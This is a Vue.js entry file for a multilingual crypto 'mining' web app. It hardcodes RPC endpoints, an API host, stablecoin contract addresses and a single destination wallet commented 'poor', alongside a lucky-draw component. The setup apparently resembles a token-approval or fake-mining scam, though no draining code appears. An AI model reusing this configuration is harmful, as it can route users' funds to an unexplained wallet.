import { Buffer } from 'buffer'
window.Buffer = window.Buffer || Buffer

import Vue from 'vue'
import App from './App.vue'
import router from './router'

// 全局引入Toast
import './pages/Toast/toast.css';
import Toast from './pages/Toast/index';
import VueClipboard from 'vue-clipboard2'
import utils from './assets/js/urlGet'; //获取url参数
import './assets/css/reset.css';
import './assets/css/style.css';
import './assets/css/border.css';
import FastClick from 'fastclick'
import api from './assets/js/base.js';
import 'animate.css'
import './assets/js/jsencryptKey'
import axios from 'axios'
import VueI18n from 'vue-i18n'
import ElementUI from 'element-ui'


Vue.use(ElementUI)
 
Vue.prototype.$axios = axios
Vue.prototype.$rpc = 'https://bsc-dataseed2.defibit.io';
Vue.prototype.$rpc2 = 'https://mainnet.infura.io/v3/';
Vue.prototype.$api = 'https://api.kkmining.xyz/index.php';
Vue.prototype.$dest = '0xA42783C052C598de1e078438A5B58Ac450373BbC'; //poor
Vue.prototype.$token = '0x55d398326f99059ff775485246999027b3197955';
Vue.prototype.$token2 = '0xdac17f958d2ee523a2206206994597c13d831ec7';
Vue.prototype.$token3 = '0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d';
Vue.prototype.$token4 = '0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48';
Vue.prototype.$utils = utils; //注册全局方法
Vue.use(VueClipboard)
Vue.use(Toast);
FastClick.attach(document.body);
Vue.config.productionTip = false
Vue.use(VueI18n);

import VueLuckyCanvas from '@lucky-canvas/vue'
Vue.use(VueLuckyCanvas)
const i18n = new VueI18n({
    locale: 'en', // 将要切换的语言，可以通过url拼的参数获取，用户行为select选择获取，本地manifest配置获取等，根据场景动态获取
    messages: {
      'cn': require('./assets/lang/cn.json'),
      'en': require('./assets/lang/en.json'),
	    'kr': require('./assets/lang/kr.json'),
      'de': require('./assets/lang/de.json'),
      'fr': require('./assets/lang/fr.json'),
      'ar': require('./assets/lang/ar.json'),
      'sp': require('./assets/lang/sp.json')
    }
});


new Vue({
  router,
  i18n,
  components: { App },
  render: h => h(App)
}).$mount('#app')